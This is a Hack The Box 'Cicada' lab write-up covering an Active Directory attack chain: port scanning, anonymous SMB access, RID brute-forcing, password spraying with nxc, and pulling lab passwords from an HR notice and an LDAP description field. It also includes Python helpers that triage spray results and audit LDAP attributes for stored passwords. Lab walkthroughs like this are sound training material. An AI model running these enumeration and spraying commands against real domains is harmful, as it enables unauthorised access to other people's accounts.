HTB Cicada done
Cicada
OS:
Windows Active Directory
Technology:
IP Address:
10.129.147.111
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 21:08:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
60291/tcp open msrpc Microsoft Windows RPC
Users and passwords:
From file: Notice from HR.txt
default password
Cicada$M6Corpb*@Lp#nZp!8
---
After password spraying
L: michael.wrightson
P: Cicada$M6Corpb*@Lp#nZp!8
---
Found a password in the domain via LDAP
P: aRt$Lp#7t*VQ!3
---
After password spraying
L: david.orelious
P: aRt$Lp#7t*VQ!3
---
After reading file: Backup_script.ps1
L: emily.oscars
P: Q!3@Lp#M6b*7t*Vt
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.147.111_nmap 10.129.147.111 ; cat 10.129.147.111_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 14:04 UTC
Nmap scan report for 10.129.147.111
Host is up (0.056s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 21:08:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
60291/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-20T21:09:54
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Add IP address to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ cat /etc/hosts | grep cicada
10.129.147.111 cicada.htb cicada-dc.cicada.htb
SMB: anonymous
List all shares
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ smbclient -L //10.129.147.111 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.147.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Download file from share: HR
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ smbclient //10.129.147.111/DEV -N
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ smbclient //10.129.147.111/HR -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 12:29:09 2024
.. D 0 Thu Mar 14 12:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 17:31:48 2024
4168447 blocks of size 4096. 428337 blocks available
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (9.0 KiloBytes/sec) (average 9.0 KiloBytes/sec)
smb: \>
smb: \> exit
Read file: Notice from HR.txt
I found the default password:
Cicada$M6Corpb*@Lp#nZp!8
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
List all users in AD
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u "aaa" -p "" --rid-brute
SMB 10.129.142.115 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.142.115 445 CICADA-DC [+] cicada.htb\aaa: (Guest)
SMB 10.129.142.115 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
Password spraying
I used the password from the file "Notice from HR"
password: Cicada$M6Corpb*@Lp#nZp!8
I found interesting creds:
L: michael.wrightson
P: Cicada$M6Corpb*@Lp#nZp!8
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u list_user_ad.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success | grep +
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Cert:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Schema:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Enterprise:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Group:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Read-only:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Cloneable:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Protected:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Key:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Enterprise:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\RAS:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Allowed:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Denied:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\DnsAdmins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\DnsUpdateProxy:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Groups:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Dev:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] cicada.htb\:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
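The spray output above is misleading in two ways: the DC maps unknown or empty usernames to Guest, so nxc prints `[+]` for names that never authenticated, and a user list built by splitting the rid-brute output on whitespace contains group-name fragments such as `Domain` and `Cert`. The following Python is an added example, not part of the writeup: it parses both outputs so that only SidTypeUser names and only real authentications are kept. The sample lines are copied from the output above; the `[-]` line is constructed.

```python
import re
from typing import Dict, List, Tuple

# nxc status line: "<PROTO> <ip> <port> <host> <message>"
PREFIX_RE = re.compile(r"^(?P<proto>\w+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+(?P<msg>.*)$")
# --rid-brute message: "<rid>: <DOMAIN>\<name> (<SidType>)"; names may contain spaces
RID_RE = re.compile(r"^(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<sidtype>SidType\w+)\)$")
# login message: "[+|-] <DOMAIN>\<user>:<secret>[ (Guest)|(Pwn3d!)]"
LOGIN_RE = re.compile(
    r"^\[(?P<mark>[+-])\]\s+(?P<domain>[^\\]*)\\(?P<user>[^:]*):(?P<secret>.*?)(?:\s+\((?P<flag>Guest|Pwn3d!)\))?$"
)


def users_from_rid_brute(output: str, include_machines: bool = False) -> List[str]:
    """Return SidTypeUser names only; groups and aliases are dropped and machine
    accounts (trailing '$') are skipped unless asked for. Splitting the raw output
    on whitespace instead leaves fragments such as 'Domain' or 'Cert' in the list."""
    users: List[str] = []
    for line in output.splitlines():
        m = PREFIX_RE.match(line.strip())
        r = RID_RE.match(m["msg"]) if m else None
        if not r or r["sidtype"] != "SidTypeUser":
            continue
        if r["name"].endswith("$") and not include_machines:
            continue
        users.append(r["name"])
    return users


def triage_spray(output: str) -> Dict[str, List[Tuple[str, str]]]:
    """Sort nxc login lines into: 'authenticated' (the secret was accepted for that
    account), 'guest_fallback' (the DC mapped an unknown or empty username to Guest,
    so nxc prints [+] although nothing was validated) and 'failed' (user, NT status)."""
    out: Dict[str, List[Tuple[str, str]]] = {"authenticated": [], "guest_fallback": [], "failed": []}
    for line in output.splitlines():
        m = PREFIX_RE.match(line.strip())
        lg = LOGIN_RE.match(m["msg"]) if m else None
        if not lg:
            continue
        if lg["mark"] == "-":
            # failure lines carry the NT status after the secret
            _, _, status = lg["secret"].rpartition(" ")
            out["failed"].append((lg["user"], status))
        elif lg["flag"] == "Guest":
            out["guest_fallback"].append((lg["user"], lg["secret"]))
        else:
            out["authenticated"].append((lg["user"], lg["secret"]))
    return out


# Constructed samples: the lines below are copied from the nxc output on the box,
# except the [-] line, which is invented to show what 'grep +' filters away.
RID_BRUTE_SAMPLE = r"""
SMB 10.129.142.115 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
"""
SPRAY_SAMPLE = r"""
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Cert:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.142.115 445 CICADA-DC [+] cicada.htb\:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
"""

if __name__ == "__main__":
    print("users:", users_from_rid_brute(RID_BRUTE_SAMPLE))
    for bucket, hits in triage_spray(SPRAY_SAMPLE).items():
        print(f"{bucket}: {hits}")
```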
SMB: user michael.wrightson - rabbit hole
Check access to shares
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ smbclient //cicada.htb/SYSVOL -U 'michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Aug 22 13:40:07 2024
.. D 0 Thu Mar 14 07:08:56 2024
cicada.htb Dr 0 Thu Mar 14 07:08:56 2024
4168447 blocks of size 4096. 435733 blocks available
Download files from share: SYSVOL
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \cicada.htb\DfsrPrivate\*
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\GPT.INI of size 59 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/GPT.INI (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\comment.cmtx of size 554 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/comment.cmtx (4.6 KiloBytes/sec) (average 1.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\Registry.pol of size 160 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/Registry.pol (1.3 KiloBytes/sec) (average 1.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (21.4 KiloBytes/sec) (average 4.9 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\comment.cmtx of size 554 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx (4.5 KiloBytes/sec) (average 4.8 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol of size 160 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol (1.3 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1874 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (15.1 KiloBytes/sec) (average 5.6 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 5342 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (43.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ ls
10.129.147.111_nmap.gnmap 10.129.147.111_nmap.nmap 10.129.147.111_nmap.xml cicada.htb kerbrute list_user_ad.txt list_users_temp.txt 'Notice from HR.txt'
LDAP
List all records from AD (LDAP)
I found the next password in AD
P: aRt$Lp#7t*VQ!3
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc ldap cicada.htb -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8'
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB 10.129.212.172 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.129.212.172 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ ldapsearch -H ldap://cicada.htb -D '[email protected]' -w 'Cicada$M6Corpb*@Lp#nZp!8' -b 'dc=cicada,dc=htb' | grep -B3 "password is"
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
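The `grep -B3 "password is"` above works only because the note was written in plain ASCII and in that exact phrasing: ldapsearch base64-encodes any description holding non-ASCII or other unsafe characters (`description::`) and folds long values onto continuation lines, so grep misses both. The following Python is an added example, not part of the writeup: it parses LDIF properly and flags free-text attributes that look like they carry credentials. The LDIF sample is constructed; the David Orelious entry repeats the values seen above, the built-in group text is a keyword-only false positive, and the `Constructed Example` entry and its value are invented.

```python
import base64
import re
import string
from typing import Dict, Iterator, List, Optional, Tuple

FREE_TEXT_ATTRS = ("description", "info", "comment")  # attributes admins use as sticky notes
ATTR_RE = re.compile(r"^([A-Za-z][\w.;-]*)(::?)\s?(.*)$")
KEYWORD_RE = re.compile(r"\b(pass(?:word|wd)?s?|pwd|cred(?:ential)?s?|secret)\b", re.IGNORECASE)
# Only ASCII punctuation counts as a symbol, so accented letters do not inflate the class count.
CLASS_RES = tuple(re.compile(p) for p in (r"[a-z]", r"[A-Z]", r"[0-9]", "[" + re.escape(string.punctuation) + "]"))


def parse_ldif(text: str) -> Iterator[Dict[str, List[str]]]:
    """Yield {attribute: [values]} per record. Unfolds continuation lines (leading
    space), decodes 'attr:: base64' values, which ldapsearch emits for non-ASCII or
    unsafe characters, and drops dn-less blocks such as the 'search:/result:' trailer."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    record: Dict[str, List[str]] = {}
    for line in lines + [""]:  # the sentinel flushes the last record
        if line == "":
            if "dn" in record:
                yield record
            record = {}
            continue
        m = ATTR_RE.match(line)
        if line.startswith("#") or not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        record.setdefault(name.lower(), []).append(value)


def looks_like_secret(token: str) -> bool:
    """8+ characters drawn from at least three of the four character classes."""
    return len(token) >= 8 and sum(1 for r in CLASS_RES if r.search(token)) >= 3


def classify(value: str) -> Tuple[Optional[str], List[str]]:
    """'high' = password keyword plus a complex token, 'medium' = complex token only,
    'low' = keyword only (built-in group descriptions land here), None = clean."""
    keyword = bool(KEYWORD_RE.search(value))
    tokens = [t for t in value.split() if looks_like_secret(t)]
    if keyword and tokens:
        return "high", tokens
    if tokens:
        return "medium", tokens
    return ("low" if keyword else None), tokens


def audit_free_text(ldif_text: str) -> List[Dict[str, object]]:
    """One finding per suspicious free-text value, in LDIF order."""
    findings: List[Dict[str, object]] = []
    for rec in parse_ldif(ldif_text):
        for attr in FREE_TEXT_ATTRS:
            for value in rec.get(attr, []):
                severity, tokens = classify(value)
                if severity:
                    findings.append({"dn": rec["dn"][0], "attr": attr, "value": value,
                                     "severity": severity, "tokens": tokens})
    return findings


# Constructed ldapsearch-style output: the David Orelious entry repeats the values seen
# on the box, the built-in group text is a keyword-only false positive, and the
# 'Constructed Example' entry is invented and base64-encoded because of the umlaut.
_B64 = base64.b64encode("Temporärer Zugang: Kx7#pq2Lm9w".encode("utf-8")).decode("ascii")
SAMPLE_LDIF = f"""\
# extended LDIF, base <dc=cicada,dc=htb> with scope subtree
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3

dn: CN=Denied RODC Password Replication Group,CN=Users,DC=cicada,DC=htb
objectClass: group
description: Members in this group cannot have their passwords replicated to a
 ny read-only domain controllers in the domain

dn: CN=Constructed Example,CN=Users,DC=cicada,DC=htb
objectClass: user
description:: {_B64}

dn: CN=Plain Example,CN=Users,DC=cicada,DC=htb
objectClass: user
description: Marketing team, office 204

# search result
search: 2
result: 0 Success
"""
```

Running `audit_free_text(SAMPLE_LDIF)` reports the David Orelious note as high, the built-in group description as low and the base64-encoded entry as medium; the plain entry produces nothing.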
Password spraying
Found the next creds:
L: david.orelious
P: aRt$Lp#7t*VQ!3
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u list_user_ad.txt -p 'aRt$Lp#7t*VQ!3' --continue-on-success | grep +
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Cert:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Schema:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Enterprise:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Group:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Read-only:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Cloneable:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Protected:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Key:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Enterprise:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\RAS:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Allowed:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Denied:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\DnsAdmins:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\DnsUpdateProxy:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Groups:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Dev:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] cicada.htb\:aRt$Lp#7t*VQ!3 (Guest)
SMB: user david.orelious
Download file from share DEV: Backup_script.ps1
